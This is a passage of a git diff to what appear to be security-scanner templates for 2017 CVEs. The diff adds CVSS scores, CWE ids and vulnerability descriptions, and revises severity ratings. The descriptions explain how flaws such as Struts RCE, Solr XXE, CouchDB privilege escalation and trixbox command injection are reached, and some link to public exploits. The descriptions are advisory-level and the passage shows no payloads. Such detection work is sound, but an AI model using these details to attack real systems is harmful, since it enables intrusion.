CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + cvss-score: 7.50 + cve-id: CVE-2017-10271 requests: - raw: diff --git a/cves/2017/CVE-2017-11444.yaml b/cves/2017/CVE-2017-11444.yaml index 0af1f0dba3..324b2e11ac 100644 --- a/cves/2017/CVE-2017-11444.yaml +++ b/cves/2017/CVE-2017-11444.yaml @@ -3,12 +3,17 @@ id: CVE-2017-11444 info: name: Subrion CMS SQL Injection author: dwisiswant0 - severity: high + severity: critical description: Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array. reference: - https://github.com/intelliants/subrion/issues/479 - https://mp.weixin.qq.com/s/89mCnjUCvmptLsKaeVlC9Q tags: cve,cve2017,sqli,subrion + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-11444 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2017/CVE-2017-12149.yaml b/cves/2017/CVE-2017-12149.yaml index fd2fd2781a..8ead0e5c2a 100755 --- a/cves/2017/CVE-2017-12149.yaml +++ b/cves/2017/CVE-2017-12149.yaml @@ -10,6 +10,11 @@ info: - https://chowdera.com/2020/12/20201229190934023w.html - https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149 tags: cve,cve2017,java,rce,deserialization + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-12149 + cwe-id: CWE-502 requests: - raw: diff --git a/cves/2017/CVE-2017-12542.yaml b/cves/2017/CVE-2017-12542.yaml index da7a45c350..e6b40b0d91 100644 --- a/cves/2017/CVE-2017-12542.yaml +++ b/cves/2017/CVE-2017-12542.yaml @@ -9,6 +9,10 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2017-12542 - https://www.exploit-db.com/exploits/44005 tags: cve,cve2017,ilo4,hpe + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2017-12542 requests: - method: GET diff --git a/cves/2017/CVE-2017-12611.yaml b/cves/2017/CVE-2017-12611.yaml index ae2639eebb..d4f8d1050e 100644 --- a/cves/2017/CVE-2017-12611.yaml +++ b/cves/2017/CVE-2017-12611.yaml @@ -7,6 +7,11 @@ info: description: In Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1, using an unintentional expression in a Freemarker tag instead of string literals can lead to a RCE attack. reference: https://struts.apache.org/docs/s2-053.html tags: cve,cve2017,apache,rce,struts + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-12611 + cwe-id: CWE-20 requests: - method: POST diff --git a/cves/2017/CVE-2017-12615.yaml b/cves/2017/CVE-2017-12615.yaml index e78786d62d..2c16f2c1fe 100644 --- a/cves/2017/CVE-2017-12615.yaml +++ b/cves/2017/CVE-2017-12615.yaml @@ -3,7 +3,7 @@ id: CVE-2017-12615 info: name: Apache Tomcat RCE author: pikpikcu - severity: critical + severity: high tags: cve,cve2017,apache,rce reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615 description: | @@ -11,6 +11,11 @@ info: This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79} Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2017-12615 + cwe-id: CWE-434 requests: - method: PUT diff --git a/cves/2017/CVE-2017-12629.yaml b/cves/2017/CVE-2017-12629.yaml index f9f543a9b9..653122ae26 100644 --- a/cves/2017/CVE-2017-12629.yaml +++ b/cves/2017/CVE-2017-12629.yaml @@ -10,6 +10,12 @@ info: - https://twitter.com/honoki/status/1298636315613974532 - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-12629 + cwe-id: CWE-611 + description: "Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr." requests: - raw: diff --git a/cves/2017/CVE-2017-12635.yaml b/cves/2017/CVE-2017-12635.yaml index 5565f23393..7e7edb5586 100644 --- a/cves/2017/CVE-2017-12635.yaml +++ b/cves/2017/CVE-2017-12635.yaml @@ -3,10 +3,15 @@ id: CVE-2017-12635 info: name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 Remote Privilege Escalation author: pikpikcu - severity: high + severity: critical description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges. reference: https://github.com/assalielmehdi/CVE-2017-12635 tags: cve,cve2017,couchdb + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-12635 + cwe-id: CWE-269 requests: - raw: diff --git a/cves/2017/CVE-2017-12637.yaml b/cves/2017/CVE-2017-12637.yaml index 46cbdb8d04..905e10391a 100644 --- a/cves/2017/CVE-2017-12637.yaml +++ b/cves/2017/CVE-2017-12637.yaml @@ -10,6 +10,11 @@ info: - https://www.cvedetails.com/cve/CVE-2017-12637/ - https://nvd.nist.gov/vuln/detail/CVE-2017-12637 - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-12637 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2017/CVE-2017-12794.yaml b/cves/2017/CVE-2017-12794.yaml index 56d43089ee..ad1ea847cc 100644 --- a/cves/2017/CVE-2017-12794.yaml +++ b/cves/2017/CVE-2017-12794.yaml @@ -10,6 +10,11 @@ info: description: | In Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5, HTML autoescaping was disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allowed a cross-site scripting attack. This vulnerability shouldn't affect most production sites since you shouldn't run with "DEBUG = True" (which makes this page accessible) in your production settings. tags: xss,django,cve,cve2017 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-12794 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-14535.yaml b/cves/2017/CVE-2017-14535.yaml index 6a91a097cf..a9b3be6385 100644 --- a/cves/2017/CVE-2017-14535.yaml +++ b/cves/2017/CVE-2017-14535.yaml @@ -8,6 +8,12 @@ info: - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ - https://www.exploit-db.com/exploits/49913 tags: cve,cve2017,trixbox,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2017-14535 + cwe-id: CWE-78 + description: "trixbox 2.8.0.4 has OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php." requests: - raw: diff --git a/cves/2017/CVE-2017-14537.yaml b/cves/2017/CVE-2017-14537.yaml index 9772411357..03689a2002 100644 --- a/cves/2017/CVE-2017-14537.yaml +++ b/cves/2017/CVE-2017-14537.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2017-14537 - https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/ - https://sourceforge.net/projects/asteriskathome/ # vendor homepage + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.50 + cve-id: CVE-2017-14537 + cwe-id: CWE-22 requests: - raw: diff --git a/cves/2017/CVE-2017-14651.yaml b/cves/2017/CVE-2017-14651.yaml index 763aeee7c4..91fc63e9f3 100644 --- a/cves/2017/CVE-2017-14651.yaml +++ b/cves/2017/CVE-2017-14651.yaml @@ -6,6 +6,15 @@ info: severity: medium description: WSO2 Data Analytics Server 3.1.0 has XSS in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter. tags: cve,cve2017,wso2,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.80 + cve-id: CVE-2017-14651 + cwe-id: CWE-79 + reference: + - https://github.com/cybersecurityworks/Disclosed/issues/15 + - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2017-0265 + - https://cybersecurityworks.com/zerodays/cve-2017-14651-wso2.html requests: - method: GET diff --git a/cves/2017/CVE-2017-14849.yaml b/cves/2017/CVE-2017-14849.yaml index 184da5d96f..6a386ab381 100644 --- a/cves/2017/CVE-2017-14849.yaml +++ b/cves/2017/CVE-2017-14849.yaml @@ -6,6 +6,15 @@ info: severity: high description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules. tags: cve,cve2017,nodejs,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-14849 + cwe-id: CWE-22 + reference: + - https://twitter.com/nodejs/status/913131152868876288 + - https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/ + - http://www.securityfocus.com/bid/101056 requests: - method: GET diff --git a/cves/2017/CVE-2017-15647.yaml b/cves/2017/CVE-2017-15647.yaml index 5102cbacf4..57a6eda186 100644 --- a/cves/2017/CVE-2017-15647.yaml +++ b/cves/2017/CVE-2017-15647.yaml @@ -3,12 +3,17 @@ id: CVE-2017-15647 info: name: FiberHome - Directory Traversal author: daffainfo - severity: medium + severity: high description: On FiberHome routers, Directory Traversal exists in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value. reference: - https://www.exploit-db.com/exploits/44054 - https://www.cvedetails.com/cve/CVE-2017-15647 tags: cve,cve2017,lfi,router + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-15647 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2017/CVE-2017-15715.yaml b/cves/2017/CVE-2017-15715.yaml index 2de5b8d83a..2a2853e552 100644 --- a/cves/2017/CVE-2017-15715.yaml +++ b/cves/2017/CVE-2017-15715.yaml @@ -7,6 +7,11 @@ info: reference: https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715 severity: high tags: cve,cve2017,apache,httpd,fileupload + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2017-15715 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2017/CVE-2017-15944.yaml b/cves/2017/CVE-2017-15944.yaml index f68fcd4a77..41f4f5c82f 100644 --- a/cves/2017/CVE-2017-15944.yaml +++ b/cves/2017/CVE-2017-15944.yaml @@ -7,8 +7,12 @@ info: reference: - https://www.exploit-db.com/exploits/43342 - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html - severity: high + severity: critical tags: cve,cve2017,rce,vpn,paloalto,globalprotect + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-15944 requests: - raw: diff --git a/cves/2017/CVE-2017-16806.yaml b/cves/2017/CVE-2017-16806.yaml index ef7744125e..e4057dae37 100644 --- a/cves/2017/CVE-2017-16806.yaml +++ b/cves/2017/CVE-2017-16806.yaml @@ -6,6 +6,12 @@ info: reference: https://www.exploit-db.com/exploits/43141 severity: high tags: cve,cve2017,ulterius,traversal + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-16806 + cwe-id: CWE-22 + description: "The Process function in RemoteTaskServer/WebServer/HttpServer.cs in Ulterius before 1.9.5.0 allows HTTP server directory traversal." requests: - method: GET diff --git a/cves/2017/CVE-2017-16877.yaml b/cves/2017/CVE-2017-16877.yaml index 6af9898153..ed8c14a5be 100644 --- a/cves/2017/CVE-2017-16877.yaml +++ b/cves/2017/CVE-2017-16877.yaml @@ -7,6 +7,11 @@ info: description: ZEIT Next.js before 2.4.1 has directory traversal under the /_next and /static request namespace, allowing attackers to obtain sensitive information. reference: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9 tags: cve,cve2017,nextjs,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-16877 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2017/CVE-2017-17043.yaml b/cves/2017/CVE-2017-17043.yaml index 8dab040905..9eb08d7a3a 100644 --- a/cves/2017/CVE-2017-17043.yaml +++ b/cves/2017/CVE-2017-17043.yaml @@ -7,6 +7,11 @@ info: description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly. reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043 tags: cve,cve2017,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-17043 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-17059.yaml b/cves/2017/CVE-2017-17059.yaml index 10ad0d299d..5fcc0923df 100644 --- a/cves/2017/CVE-2017-17059.yaml +++ b/cves/2017/CVE-2017-17059.yaml @@ -9,6 +9,11 @@ info: - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2017-17059 tags: cve,cve2017,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-17059 + cwe-id: CWE-79 requests: - method: POST diff --git a/cves/2017/CVE-2017-17451.yaml b/cves/2017/CVE-2017-17451.yaml index 9a2c3bce2f..2cd0371034 100644 --- a/cves/2017/CVE-2017-17451.yaml +++ b/cves/2017/CVE-2017-17451.yaml @@ -7,6 +7,11 @@ info: description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451 tags: cve,cve2017,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-17451 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-17562.yaml b/cves/2017/CVE-2017-17562.yaml index ab048ea172..0f87ecde9f 100644 --- a/cves/2017/CVE-2017-17562.yaml +++ b/cves/2017/CVE-2017-17562.yaml @@ -10,6 +10,11 @@ info: - https://github.com/vulhub/vulhub/tree/master/goahead/CVE-2017-17562 severity: high tags: cve,cve2017,rce,embedthis,goahead,fuzz + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2017-17562 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2017/CVE-2017-18024.yaml b/cves/2017/CVE-2017-18024.yaml index 9388b6bf6c..89de79241d 100644 --- a/cves/2017/CVE-2017-18024.yaml +++ b/cves/2017/CVE-2017-18024.yaml @@ -11,6 +11,11 @@ info: description: | AvantFAX 3.3.3 has XSS via an arbitrary parameter name to the default URI, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1. tags: cve,cve2017,xss,avantfax + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-18024 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2017/CVE-2017-18536.yaml b/cves/2017/CVE-2017-18536.yaml index 7bed4c11c3..4f60e9dca3 100644 --- a/cves/2017/CVE-2017-18536.yaml +++ b/cves/2017/CVE-2017-18536.yaml @@ -7,6 +7,11 @@ info: description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 tags: cve,cve2017,wordpress,xss,wp-plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-18536 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-18638.yaml b/cves/2017/CVE-2017-18638.yaml index fc7f16e8cc..8c240d1426 100644 --- a/cves/2017/CVE-2017-18638.yaml +++ b/cves/2017/CVE-2017-18638.yaml @@ -11,6 +11,11 @@ info: - https://github.com/advisories/GHSA-vfj6-275q-4pvm - https://nvd.nist.gov/vuln/detail/CVE-2017-18638 tags: cve,cve2017,graphite,ssrf,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2017-18638 + cwe-id: CWE-918 requests: - method: GET diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml index 5ccba81a04..0e0bff68e3 100644 --- a/cves/2017/CVE-2017-3506.yaml +++ b/cves/2017/CVE-2017-3506.yaml @@ -9,6 +9,10 @@ info: reference: - https://hackerone.com/reports/810778 - https://nvd.nist.gov/vuln/detail/CVE-2017-3506 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 7.40 + cve-id: CVE-2017-3506 requests: - raw: diff --git a/cves/2017/CVE-2017-3528.yaml b/cves/2017/CVE-2017-3528.yaml index 2003bf9c99..b172154381 100644 --- a/cves/2017/CVE-2017-3528.yaml +++ b/cves/2017/CVE-2017-3528.yaml @@ -3,11 +3,17 @@ id: CVE-2017-3528 info: name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect author: 0x_Akoko - severity: low + severity: medium reference: - https://blog.zsec.uk/cve-2017-3528/ - https://www.exploit-db.com/exploits/43592 tags: oracle,redirect + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N + cvss-score: 5.40 + cve-id: CVE-2017-3528 + cwe-id: CWE-601 + description: "Vulnerability in the Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)). Supported versions that are affected are 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily \"exploitable\" vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data. CVSS 3.0 Base Score 4.7 (Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N)." requests: - method: GET diff --git a/cves/2017/CVE-2017-3881.yaml b/cves/2017/CVE-2017-3881.yaml index 3e200f2bf4..e852d525d0 100644 --- a/cves/2017/CVE-2017-3881.yaml +++ b/cves/2017/CVE-2017-3881.yaml @@ -10,6 +10,11 @@ info: - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/dos/cisco/ios_telnet_rocem.md description: RCE exploit code is available for Cisco Catalyst 2960 switch model. This exploit is firmware dependent. tags: cve,cve2017,cisco,rce,network + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-3881 + cwe-id: CWE-20 network: - inputs: diff --git a/cves/2017/CVE-2017-4011.yaml b/cves/2017/CVE-2017-4011.yaml index 23b1ffb9b3..835026085e 100644 --- a/cves/2017/CVE-2017-4011.yaml +++ b/cves/2017/CVE-2017-4011.yaml @@ -10,6 +10,11 @@ info: - https://kc.mcafee.com/corporate/index?page=content&id=SB10198 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-4011 tags: cve,cve2017,mcafee,xss + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-4011 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-5487.yaml b/cves/2017/CVE-2017-5487.yaml index f7e9caec0e..75f2ff83e6 100644 --- a/cves/2017/CVE-2017-5487.yaml +++ b/cves/2017/CVE-2017-5487.yaml @@ -3,12 +3,17 @@ id: CVE-2017-5487 info: name: WordPress Core < 4.7.1 - Username Enumeration author: Manas_Harsh,daffainfo,geeknik - severity: info + severity: medium description: wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request. tags: cve,cve2017,wordpress reference: - https://nvd.nist.gov/vuln/detail/CVE-2017-5487 - https://www.exploit-db.com/exploits/41497 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2017-5487 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2017/CVE-2017-5521.yaml b/cves/2017/CVE-2017-5521.yaml index 3421006395..7c792b2225 100644 --- a/cves/2017/CVE-2017-5521.yaml +++ b/cves/2017/CVE-2017-5521.yaml @@ -2,12 +2,17 @@ id: CVE-2017-5521 info: name: Bypassing Authentication on NETGEAR Routers author: princechaddha - severity: medium + severity: high description: An issue was discovered on NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices.They are prone to password disclosure via simple crafted requests to the web management server. reference: - https://www.cvedetails.com/cve/CVE-2017-5521/ - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2017-5521-bypassing-authentication-on-netgear-routers/ tags: cve,cve2017,auth-bypass + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.10 + cve-id: CVE-2017-5521 + cwe-id: CWE-200 requests: - method: GET diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml index ad22c9704a..0d112f3194 100644 --- a/cves/2017/CVE-2017-5638.yaml +++ b/cves/2017/CVE-2017-5638.yaml @@ -6,6 +6,11 @@ info: description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attacker’s invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server. tags: cve,cve2017,struts,rce,apache reference: https://github.com/mazen160/struts-pwn + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2017-5638 + cwe-id: CWE-20 requests: - raw: diff --git a/cves/2017/CVE-2017-6090.yaml b/cves/2017/CVE-2017-6090.yaml index f9c76aab23..38352df854 100644 --- a/cves/2017/CVE-2017-6090.yaml +++ b/cves/2017/CVE-2017-6090.yaml @@ -3,9 +3,15 @@ id: CVE-2017-6090 info: name: PhpCollab (unauthenticated) Arbitrary File Upload author: pikpikcu - severity: critical + severity: high tags: cve,cve2017,phpcollab,rce,fileupload reference: https://nvd.nist.gov/vuln/detail/CVE-2017-6090 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2017-6090 + cwe-id: CWE-434 + description: "Unrestricted file upload vulnerability in clients/editclient.php in PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/." requests: - raw: diff --git a/cves/2017/CVE-2017-7269.yaml b/cves/2017/CVE-2017-7269.yaml index 82e8e080d4..533586dd4f 100644 --- a/cves/2017/CVE-2017-7269.yaml +++ b/cves/2017/CVE-2017-7269.yaml @@ -9,6 +9,11 @@ info: - https://blog.0patch.com/2017/03/0patching-immortal-cve-2017-7269.html - https://github.com/danigargu/explodingcan/blob/master/explodingcan.py tags: cve,cve2017,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2017-7269 + cwe-id: CWE-119 requests: - method: OPTIONS diff --git a/cves/2017/CVE-2017-7391.yaml b/cves/2017/CVE-2017-7391.yaml index a3ebfb4f8d..b17e18d01d 100644 --- a/cves/2017/CVE-2017-7391.yaml +++ b/cves/2017/CVE-2017-7391.yaml @@ -9,6 +9,11 @@ info: reference: - https://github.com/dweeves/magmi-git/issues/522 - https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2017-7391 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2017/CVE-2017-7615.yaml b/cves/2017/CVE-2017-7615.yaml index de43a2eddc..cadec418f8 100644 --- a/cves/2017/CVE-2017-7615.yaml +++ b/cves/2017/CVE-2017-7615.yaml @@ -15,6 +15,11 @@ info: - https://sourceforge.net/projects/mantisbt/files/mantis-stable/ - http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt - https://www.exploit-db.com/exploits/41890 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2017-7615 + cwe-id: CWE-640 requests: - method: GET diff --git a/cves/2017/CVE-2017-7921.yaml b/cves/2017/CVE-2017-7921.yaml index d3dde0e997..5a1fbdfe03 100644 --- a/cves/2017/CVE-2017-7921.yaml +++ b/cves/2017/CVE-2017-7921.yaml @@ -2,12 +2,17 @@ id: CVE-2017-7921 info: name: Hikvision Authentication Bypass author: princechaddha - severity: high + severity: critical description: An Improper Authentication issue was discovered in Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information. reference: - http://www.hikvision.com/us/about_10805.html - https://ics-cert.us-cert.gov/advisories/ICSA-17-124-01 tags: cve,cve2017,auth-bypass + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.00 + cve-id: CVE-2017-7921 + cwe-id: CWE-287 requests: - method: GET diff --git a/cves/2017/CVE-2017-8917.yaml b/cves/2017/CVE-2017-8917.yaml index ccad58de39..a4968604e8 100644 --- a/cves/2017/CVE-2017-8917.yaml +++ b/cves/2017/CVE-2017-8917.yaml @@ -2,10 +2,15 @@ id: CVE-2017-8917 info: name: Joomla SQL Injection author: princechaddha - severity: high + severity: critical description: SQL injection vulnerability in Joomla! 3.7.x before 3.7.1 allows attackers to execute arbitrary SQL commands via unspecified vectors. reference: https://www.cvedetails.com/cve/CVE-2017-8917/ tags: cve,cve2017,joomla,sqli + classification: + 